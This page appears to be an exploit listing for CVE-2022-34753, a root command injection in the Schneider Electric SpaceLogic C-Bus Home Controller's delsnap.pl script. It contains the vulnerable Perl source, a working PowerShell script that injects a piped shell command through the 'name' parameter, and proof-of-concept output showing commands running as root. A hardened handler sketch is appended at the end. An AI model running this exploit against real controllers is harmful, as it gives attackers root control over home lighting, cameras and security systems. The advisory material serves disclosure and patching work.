## https://sploitus.com/exploit?id=PACKETSTORM:167783
<#SpaceLogic.ps1  
  
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit  
  
  
Vendor: Schneider Electric SE  
Product web page: https://www.se.com  
https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/  
https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware  
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)  
formerly known as C-Bus Wiser Home Controller MK2  
V1.31.460 and prior  
Firmware: 604  
  
Summary: SpaceLogic C-Bus Home Automation System  
Lighting control and automation solutions for  
buildings of the future, part of SpaceLogic.  
SpaceLogic C-Bus is a powerful, fully integrated  
system that can control and automate lighting  
and many other electrical systems and products.  
The SpaceLogic C-Bus system is robust, flexible,  
scalable and has proven solutions for buildings  
of the future. Implemented for commercial and  
residential buildings automation, it brings  
control, comfort, efficiency and ease of use  
to its occupants.  
  
Wiser Home Control makes technologies in your  
home easy by providing seamless control of music,  
home theatre, lighting, air conditioning, sprinkler  
systems, curtains and shutters, security systems...  
you name it. Usable anytime, anywhere even when  
you are away, via preset shortcuts or direct  
control, in the same look and feel from a wall  
switch, a home computer, or even your smartphone  
or TV - there is no wiser way to enjoy 24/7  
connectivity, comfort and convenience, entertainment  
and peace of mind homewide!   
  
The Wiser 2 Home Controller allows you to access  
your C-Bus using a graphical user interface, sometimes  
referred to as the Wiser 2 UI. The Wiser 2 Home  
Controller arrives with a sample project loaded  
and the user interface accessible from your local  
home network. With certain options set, you can  
also access the Wiser 2 UI from anywhere using  
the Internet. Using the Wiser 2 Home Controller  
you can: control equipment such as IP cameras,  
C-Bus devices and non C-Bus wired and wireless  
equipment on the home LAN, schedule events in  
the home, create and store scenes on-board, customise  
a C-Bus system using the on-board Logic Engine,  
monitor the home environment including C-Bus and  
security systems, control ZigBee products such  
as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.  
  
Examples of equipment you might access with Wiser  
2 Home Controller include lighting, HVAC, curtains,  
cameras, sprinkler systems, power monitoring, Ulti-ZigBee,  
multi-room audio and security controls.  
  
Desc: The home automation solution suffers from  
an authenticated OS command injection vulnerability.  
This can be exploited to inject and execute arbitrary  
shell commands as the root user via the 'name' GET  
parameter in the 'delsnap.pl' Perl/CGI script, which is  
used for deleting snapshots taken from the webcam.  
  
=========================================================  
/www/delsnap.pl:  
----------------  
  
#!/usr/bin/perl  
use IO::Handle;  
  
  
select(STDERR);  
$| = 1;  
select(STDOUT);  
$| = 1;  
  
#print "\r\n\r\n";  
  
$CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';  
use CGI;  
  
my $PROGNAME = "delsnap.pl";  
  
my $cgi = new CGI();  
  
my $name = $cgi->param('name');  
if ($name eq "list") {  
    print "\r\n\r\n";  
    print "DATA=";  
    print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;  
    exit(0);  
}  
if ($name eq "deleteall") {  
    print "\r\n\r\n";  
    print "DELETINGALL=TRUE&";  
    print `rm /mnt/microsd/clipsal/ugen/imgs/*`;  
    print "COMPLETED=true\n";  
    exit(0);  
}  
#print "name $name\n";  
print "\r\n\r\n";  
my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";  
  
unlink $filename or die "COMPLETED=false\n";  
  
print "COMPLETED=true\n";  
  
=========================================================  
  
Tested on: Machine: OMAP3 Wiser2 Board  
CPU: ARMv7 revision 2  
GNU/Linux 2.6.37 (armv7l)  
BusyBox v1.22.1  
thttpd/2.25b  
Perl v5.20.0  
Clipsal 81  
Angstrom 2009.X-stable  
PICED 4.14.0.100  
lighttpd/1.7  
GCC 4.4.3  
NodeJS v10.15.3  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5710  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php  
  
Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf  
  
CVE ID: CVE-2022-34753  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753  
  
  
27.03.2022  
  
#>  
  
  
$host.UI.RawUI.ForegroundColor = "Green"  
if ($($args.Count) -ne 2) {  
    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")  
} else {  
    $ip = $args[0]  
    $cmd = $args[1]  
    $cmdinj = "/delsnap.pl?name=|$cmd"  
    Write-Host("`nSending command '$cmd' to $ip`n")  
    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj  
    curl -v $ip$cmdinj  
}  
  
  
<#PoC  
  
PS C:\> .\SpaceLogic.ps1  
  
Usage: .\SpaceLogic.ps1 [IP] [CMD]  
  
  
PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"  
  
Sending command 'uname -a;id;pwd' to 192.168.1.2  
  
VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload  
VERBOSE: received 129-byte response of content type text/html; charset=utf-8  
  
  
StatusCode : 200  
StatusDescription : OK  
Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux  
uid=0(root) gid=0(root)  
/custom-package  
  
RawContent : HTTP/1.1 200 OK  
Access-Control-Allow-Origin: *  
Connection: keep-alive  
Content-Length: 129  
Content-Type: text/html; charset=utf-8  
Date: Thu, 30 Jun 2022 14:48:43 GMT  
ETag: W/"81-LTIWJvYlDBYAlgXEy...  
Forms : {}  
Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;   
charset=utf-8]...}  
Images : {}  
InputFields : {}  
Links : {}  
ParsedHtml : mshtml.HTMLDocumentClass  
RawContentLength : 129  
  
  
  
  
PS C:\>  
#>
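
A hardened sketch of the delsnap.pl handler from the listing above, added here as an example (not vendor code and not part of the original advisory): it allowlists the `name` value and replaces the backtick `ls`/`rm` calls with in-process directory operations. The 128-character limit, the allowed character set and the `text/plain` response header are assumptions; the page does not say what form the vendor's fix takes.

```perl
#!/usr/bin/perl
# Added example: hardened sketch of the delsnap.pl logic (not vendor code).
use strict;
use warnings;
use CGI;

my $IMG_DIR = '/mnt/microsd/clipsal/ugen/imgs';   # directory from the original listing

# Accept only a plain file name: no path separators, no shell metacharacters,
# no leading dot (blocks "." / ".." and hidden files). Limits are assumptions.
sub valid_snapshot_name {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 128;
    return $name =~ /\A[A-Za-z0-9_][A-Za-z0-9._-]*\z/ ? 1 : 0;
}

# List regular files with opendir/readdir instead of shelling out to `ls`.
sub list_snapshots {
    opendir(my $dh, $IMG_DIR) or return ();
    my @files = sort grep { -f "$IMG_DIR/$_" } readdir($dh);
    closedir($dh);
    return @files;
}

my $cgi  = CGI->new;
my $name = $cgi->param('name');   # scalar context: first value only

print $cgi->header(-type => 'text/plain');

if (defined $name && $name eq 'list') {
    print "DATA=", join("\n", list_snapshots()), "\n";
}
elsif (defined $name && $name eq 'deleteall') {
    # unlink() takes a list and never invokes a shell, unlike `rm .../*`.
    my @files   = list_snapshots();
    my $deleted = unlink map { "$IMG_DIR/$_" } @files;
    print "DELETINGALL=TRUE&COMPLETED=", ($deleted == @files ? 'true' : 'false'), "\n";
}
elsif (valid_snapshot_name($name)) {
    print "COMPLETED=", (unlink("$IMG_DIR/$name") ? 'true' : 'false'), "\n";
}
else {
    # Anything else, including input containing | ; ` $ / or spaces, is refused.
    print "COMPLETED=false\n";
}
```

Because no code path passes `name` to a shell or builds a path from an unvalidated value, the handler either operates on a file directly inside the image directory or returns `COMPLETED=false`.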